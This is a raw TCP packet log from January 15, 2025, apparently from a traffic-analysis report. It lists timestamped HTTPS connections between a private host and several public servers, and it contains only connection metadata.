                                                                                                                                            Jan 15, 2025 19:14:41.182727098 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.182827950 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.182883024 CET49884443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.182888985 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.182920933 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.182957888 CET49884443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.182962894 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.182974100 CET49884443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.183151960 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.183203936 CET49884443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.183208942 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.183250904 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.183350086 CET49884443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.183356047 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.183379889 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.183397055 CET49884443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.183408022 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.183434010 CET49884443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.183497906 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.183552980 CET49884443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.183557987 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.183614016 CET49884443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.183618069 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.183738947 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.183785915 CET49884443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.183878899 CET49884443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.183890104 CET44349884104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.246807098 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.246891022 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.246922016 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.246975899 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.246992111 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.247025967 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.247040033 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.247049093 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.247070074 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.247081041 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.247087955 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.247093916 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.247129917 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.247132063 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.247147083 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.247191906 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.247204065 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.247250080 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.247263908 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.247328043 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.247334003 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.247384071 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.247490883 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.247539997 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.247998953 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.248056889 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.248136044 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.248186111 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.248195887 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.248239994 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.248253107 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.248312950 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.248728991 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.248795033 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.248821020 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.248862982 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.248903036 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.248946905 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.252506018 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.252576113 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.252679110 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.252732992 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.252770901 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.252815008 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.252819061 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.252835035 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.252859116 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.252892971 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.252933025 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.252933979 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.252948046 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.252974987 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.253376007 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.253424883 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.253437042 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.253479958 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.253504992 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.253550053 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.307951927 CET44349885104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.308228970 CET49885443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.308245897 CET44349885104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.308562040 CET44349885104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.308868885 CET49885443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.308917046 CET44349885104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.309027910 CET49885443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.333090067 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.333173990 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.333189964 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.333226919 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.333245039 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.333246946 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.333271980 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.333280087 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.333327055 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.333363056 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.333368063 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.333411932 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.333466053 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.333709002 CET49883443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.333730936 CET44349883104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.351335049 CET44349885104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.358346939 CET49885443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.358366013 CET4968080192.168.2.16192.229.211.108
                                                                                                                                            Jan 15, 2025 19:14:41.404803038 CET44349888104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.405148029 CET49888443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.405193090 CET44349888104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.405533075 CET44349888104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.405884027 CET49888443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.405965090 CET44349888104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.406060934 CET49888443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.406084061 CET49888443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.406090021 CET44349888104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.419754028 CET4434988934.120.195.249192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.420051098 CET49889443192.168.2.1634.120.195.249
                                                                                                                                            Jan 15, 2025 19:14:41.420114040 CET4434988934.120.195.249192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.421214104 CET4434988934.120.195.249192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.421278954 CET49889443192.168.2.1634.120.195.249
                                                                                                                                            Jan 15, 2025 19:14:41.421725988 CET49889443192.168.2.1634.120.195.249
                                                                                                                                            Jan 15, 2025 19:14:41.421797991 CET4434988934.120.195.249192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.421855927 CET49889443192.168.2.1634.120.195.249
                                                                                                                                            Jan 15, 2025 19:14:41.434155941 CET44349891104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.434374094 CET49891443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.434385061 CET44349891104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.434748888 CET44349891104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.435187101 CET49891443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.435276031 CET44349891104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.435307026 CET49891443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.437671900 CET49897443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.437724113 CET44349897104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.437843084 CET49897443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.438079119 CET49897443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.438102961 CET44349897104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.440649986 CET49898443192.168.2.1634.120.195.249
                                                                                                                                            Jan 15, 2025 19:14:41.440754890 CET4434989834.120.195.249192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.440871000 CET49898443192.168.2.1634.120.195.249
                                                                                                                                            Jan 15, 2025 19:14:41.441184044 CET49899443192.168.2.1634.120.195.249
                                                                                                                                            Jan 15, 2025 19:14:41.441220045 CET4434989934.120.195.249192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.441312075 CET49899443192.168.2.1634.120.195.249
                                                                                                                                            Jan 15, 2025 19:14:41.441529036 CET49900443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.441600084 CET44349900104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.441664934 CET49900443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.441792011 CET49898443192.168.2.1634.120.195.249
                                                                                                                                            Jan 15, 2025 19:14:41.441838026 CET4434989834.120.195.249192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.441950083 CET49899443192.168.2.1634.120.195.249
                                                                                                                                            Jan 15, 2025 19:14:41.441961050 CET4434989934.120.195.249192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.442123890 CET49900443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.442161083 CET44349900104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.449503899 CET44349890104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.449748039 CET49890443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.449774027 CET44349890104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.450896978 CET44349890104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.451287031 CET49890443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.451411963 CET49890443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.451422930 CET44349890104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.451500893 CET44349890104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.452367067 CET49888443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.467335939 CET4434988934.120.195.249192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.468353033 CET49889443192.168.2.1634.120.195.249
                                                                                                                                            Jan 15, 2025 19:14:41.468370914 CET4434988934.120.195.249192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.479345083 CET44349891104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.484333038 CET49891443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.500451088 CET49890443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.516330957 CET49889443192.168.2.1634.120.195.249
                                                                                                                                            Jan 15, 2025 19:14:41.528701067 CET4434988934.120.195.249192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.529002905 CET4434988934.120.195.249192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.529185057 CET49889443192.168.2.1634.120.195.249
                                                                                                                                            Jan 15, 2025 19:14:41.529395103 CET49889443192.168.2.1634.120.195.249
                                                                                                                                            Jan 15, 2025 19:14:41.529438019 CET4434988934.120.195.249192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.533864975 CET4434988713.59.241.142192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.534081936 CET49887443192.168.2.1613.59.241.142
                                                                                                                                            Jan 15, 2025 19:14:41.534149885 CET4434988713.59.241.142192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.535849094 CET4434988713.59.241.142192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.536076069 CET49887443192.168.2.1613.59.241.142
                                                                                                                                            Jan 15, 2025 19:14:41.536753893 CET49887443192.168.2.1613.59.241.142
                                                                                                                                            Jan 15, 2025 19:14:41.536753893 CET49887443192.168.2.1613.59.241.142
                                                                                                                                            Jan 15, 2025 19:14:41.536890030 CET4434988713.59.241.142192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.580468893 CET49887443192.168.2.1613.59.241.142
                                                                                                                                            Jan 15, 2025 19:14:41.580533981 CET4434988713.59.241.142192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.590436935 CET44349891104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.590518951 CET44349891104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.590589046 CET49891443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.591288090 CET49891443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.591306925 CET44349891104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.594330072 CET49901443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.594352961 CET44349901104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.594420910 CET49901443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.594680071 CET49901443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.594690084 CET44349901104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.608163118 CET44349890104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.608655930 CET44349890104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.608743906 CET44349890104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.608751059 CET49890443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.608815908 CET44349890104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.608886957 CET49890443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.608905077 CET44349890104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.608994007 CET44349890104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.609054089 CET49890443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.609066963 CET44349890104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.609206915 CET44349890104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.609268904 CET49890443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.609446049 CET49890443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.609473944 CET44349890104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.625829935 CET44349892104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.626074076 CET49892443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.626101017 CET44349892104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.627471924 CET49887443192.168.2.1613.59.241.142
                                                                                                                                            Jan 15, 2025 19:14:41.627553940 CET44349892104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.627630949 CET49892443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.628029108 CET49892443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.628110886 CET44349892104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.628235102 CET49892443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.628242970 CET44349892104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.628297091 CET49892443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.628325939 CET44349892104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.628355026 CET49892443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.634071112 CET44349888104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.634159088 CET44349888104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.634407043 CET49888443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.634682894 CET49888443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.634700060 CET44349888104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.636957884 CET49902443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.636981010 CET44349902104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.637054920 CET49902443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.637242079 CET49902443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.637255907 CET44349902104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.639383078 CET44349894104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.639600992 CET49894443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:41.639662981 CET44349894104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.640728951 CET44349894104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.640798092 CET49894443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:41.641681910 CET49894443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:41.641762972 CET44349894104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.641858101 CET49894443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:41.641876936 CET44349894104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.661962986 CET44349896151.101.130.137192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.662184000 CET49896443192.168.2.16151.101.130.137
                                                                                                                                            Jan 15, 2025 19:14:41.662246943 CET44349896151.101.130.137192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.662617922 CET44349895104.17.24.14192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.662837982 CET49895443192.168.2.16104.17.24.14
                                                                                                                                            Jan 15, 2025 19:14:41.662854910 CET44349895104.17.24.14192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.663714886 CET44349896151.101.130.137192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.663795948 CET49896443192.168.2.16151.101.130.137
                                                                                                                                            Jan 15, 2025 19:14:41.663839102 CET44349895104.17.24.14192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.663902044 CET49895443192.168.2.16104.17.24.14
                                                                                                                                            Jan 15, 2025 19:14:41.664632082 CET49896443192.168.2.16151.101.130.137
                                                                                                                                            Jan 15, 2025 19:14:41.664721966 CET44349896151.101.130.137192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.664798021 CET49896443192.168.2.16151.101.130.137
                                                                                                                                            Jan 15, 2025 19:14:41.664887905 CET49895443192.168.2.16104.17.24.14
                                                                                                                                            Jan 15, 2025 19:14:41.664961100 CET44349895104.17.24.14192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.665155888 CET49895443192.168.2.16104.17.24.14
                                                                                                                                            Jan 15, 2025 19:14:41.665169954 CET44349895104.17.24.14192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.670747995 CET4434988713.59.241.142192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.670806885 CET4434988713.59.241.142192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.670948029 CET4434988713.59.241.142192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.671017885 CET49887443192.168.2.1613.59.241.142
                                                                                                                                            Jan 15, 2025 19:14:41.671617985 CET49887443192.168.2.1613.59.241.142
                                                                                                                                            Jan 15, 2025 19:14:41.671659946 CET4434988713.59.241.142192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.675365925 CET44349892104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.682216883 CET49903443192.168.2.1618.220.176.90
                                                                                                                                            Jan 15, 2025 19:14:41.682276011 CET4434990318.220.176.90192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.682439089 CET49903443192.168.2.1618.220.176.90
                                                                                                                                            Jan 15, 2025 19:14:41.682645082 CET49903443192.168.2.1618.220.176.90
                                                                                                                                            Jan 15, 2025 19:14:41.682677984 CET4434990318.220.176.90192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.690351009 CET49894443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:41.706367016 CET49896443192.168.2.16151.101.130.137
                                                                                                                                            Jan 15, 2025 19:14:41.706372023 CET49895443192.168.2.16104.17.24.14
                                                                                                                                            Jan 15, 2025 19:14:41.706428051 CET44349896151.101.130.137192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.754354954 CET49896443192.168.2.16151.101.130.137
                                                                                                                                            Jan 15, 2025 19:14:41.763642073 CET44349896151.101.130.137192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.763772964 CET44349896151.101.130.137192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.763813019 CET44349896151.101.130.137192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.763850927 CET49896443192.168.2.16151.101.130.137
                                                                                                                                            Jan 15, 2025 19:14:41.763859987 CET44349896151.101.130.137192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.763916969 CET44349896151.101.130.137192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.763952971 CET49896443192.168.2.16151.101.130.137
                                                                                                                                            Jan 15, 2025 19:14:41.764446020 CET44349894104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.764513969 CET44349894104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.764650106 CET49894443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:41.764905930 CET49894443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:41.764905930 CET49894443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:41.764950037 CET44349894104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.765016079 CET49894443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:41.765585899 CET44349892104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.765752077 CET44349892104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.765805006 CET49892443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.766021967 CET49892443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.766038895 CET44349892104.18.69.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.766047001 CET49892443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.766096115 CET49892443192.168.2.16104.18.69.40
                                                                                                                                            Jan 15, 2025 19:14:41.766817093 CET49904443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:41.766902924 CET44349904104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.767071962 CET49904443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:41.767332077 CET49904443192.168.2.16104.18.95.41
                                                                                                                                            Jan 15, 2025 19:14:41.767364025 CET44349904104.18.95.41192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.768584013 CET49905443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.768608093 CET44349905104.18.68.40192.168.2.16
                                                                                                                                            Jan 15, 2025 19:14:41.768711090 CET49905443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.768902063 CET49905443192.168.2.16104.18.68.40
                                                                                                                                            Jan 15, 2025 19:14:41.768910885 CET44349905104.18.68.40192.168.2.16
